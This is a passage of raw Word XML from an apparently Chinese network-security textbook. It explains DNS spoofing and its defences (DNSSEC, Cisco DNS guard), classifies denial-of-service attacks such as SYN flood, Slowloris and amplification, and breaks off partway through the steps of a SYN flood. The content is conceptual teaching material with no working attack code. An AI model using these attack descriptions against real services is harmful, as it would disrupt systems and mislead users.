          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP(192.168.1.100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F5767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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>结果：用户访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>实为钓鱼网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5338D4E5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危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C4429" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钓鱼攻击：诱导用户输入账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DFB31B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件分发：将软件更新地址指向木马服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE70752" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务：将服务域名指向无效地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0010C004" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过安全机制：规避基于域名的过滤策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA30A3C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防御措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC5CCB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DNSSEC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：通过数字签名验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录真实性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45109350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>&lt;BIND&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F04D6A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>dnssec-enable yes;  // BIND</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>服务器启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DNSSEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D69DD2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网络层防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C71519C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lastRenderedPageBreak/>
        <w:t>&lt;CISCO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254C315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 xml:space="preserve">ip dns guard  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>思科设备防</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>欺骗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CCEEBF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EFE15E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击分类与典型方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A58DAA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什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B38ADA3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拒绝服务攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Denial of Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）通过耗尽目标资源（带宽</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/CPU/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存），使其无法提供正常服务。就像用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个电话同时拨打一家小店，让正常顾客永远打不进来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786A4238" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="482"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Hlk200652684"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击分类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="1F7B4FDD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>攻击分类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020"/>
        <w:gridCol w:w="3626"/>
        <w:gridCol w:w="3198"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1EBE3EF4" w14:textId="77777777" w:rsidTr="00501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8B38BF4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攻击类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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B0CF218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攻击原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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AB0767C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典型案例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4FA3EE63" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0381CA32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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>带宽耗尽型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="25369271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堵塞目标网络带宽</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="399CCE52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UDP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洪水攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5904B0CA" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5EFD3A8F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rFonts w:cs="Times New Roman"/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协议漏洞型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33BC5DB0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利用协议缺陷耗尽系统资源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C62E554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SYN Flood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、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Ping of Death</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="6054F501" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="23FF1717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应用层攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C25A1CE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消耗服务器计算资源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1ABD0426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HTTP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洪水、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Slowloris</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0A7CF103" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="364800FA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反射放大攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="035A59F4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利用第三方服务放大攻击流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C39A508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DNS/NTP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放大攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7636B00A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0C796D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带宽攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>辆卡车堵死高速公路入口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B25F0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协议攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>派</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人假装顾客占满餐厅座位但不点餐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130B2BC7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应用层攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求店员反复打包退货消耗其精力</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B1EA0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放大攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用扩音器把小声指令变成巨大噪音</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF2B5D9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Hlk200654362"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TCP SYN Flood</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D36F183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攻击原理（三步模拟）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC2AD2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="480" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者：伪造大量虚假</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向服务器发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包（第一次握手）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C639A6B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="480" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器：分配资源等待第三次握手，回复</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN-ACK</w:t>
      </w:r>
    </w:p>
